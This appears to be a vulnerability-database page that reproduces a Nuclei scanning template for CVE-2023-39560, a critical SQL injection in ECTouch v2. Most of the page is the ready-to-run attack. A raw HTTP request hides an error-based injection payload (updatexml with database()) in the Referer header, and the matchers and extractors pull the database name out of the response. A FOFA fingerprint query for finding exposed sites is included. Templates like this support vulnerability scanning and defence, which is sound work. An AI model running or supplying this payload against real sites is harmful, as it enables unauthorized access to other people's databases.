漏洞描述
ECTouch v2 was discovered to contain a SQL injection vulnerability via the $arr['id'] parameter at \default\helpers\insert.php.
CVE-2023-39560: ECTouch v2 - SQL Injection
PoC代码[已公开]
id: CVE-2023-39560
info:
name: ECTouch v2 - SQL Injection
author: s4e-io
severity: critical
description: |
ECTouch v2 was discovered to contain a SQL injection vulnerability via the $arr['id'] parameter at \default\helpers\insert.php.
reference:
- https://wiki.bachang.org/doc/2582/
- https://nvd.nist.gov/vuln/detail/CVE-2023-39560
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-39560
cwe-id: CWE-89
epss-score: 0.60798
epss-percentile: 0.98201
cpe: cpe:2.3:a:ectouch:ectouch:2.0:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: ectouch
product: ectouch
fofa-query: icon_hash="127711143"
tags: cve,cve2023,ectouch,sqli,vuln
http:
- raw:
- |
GET /index.php?m=default&c=user&a=register&u=0 HTTP/1.1
Host: {{Hostname}}
Referer: 554fcae493e564ee0dc75bdf2ebf94cabought_notes|a:1:{s:2:"id";s:49:"0&&updatexml(1,concat(0x7e,(database()),0x7e),1)#";}
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "XPATH syntax error: '~[^~]+~'<br>"
- type: status
status:
- 200
extractors:
- type: regex
part: body
group: 1
regex:
- "XPATH syntax error: '~([a-z0-9]+)~'"
# digest: 490a004630440220706bf265f3ca8d62a3a4905bd8bf42c8c62ec9422f9f3b69126492436883645a02205202ebc888fec4677554630035c9bb5f748e570932517e4c6b69a2820e55284e:922c64590222798bb761d5b6d8e72950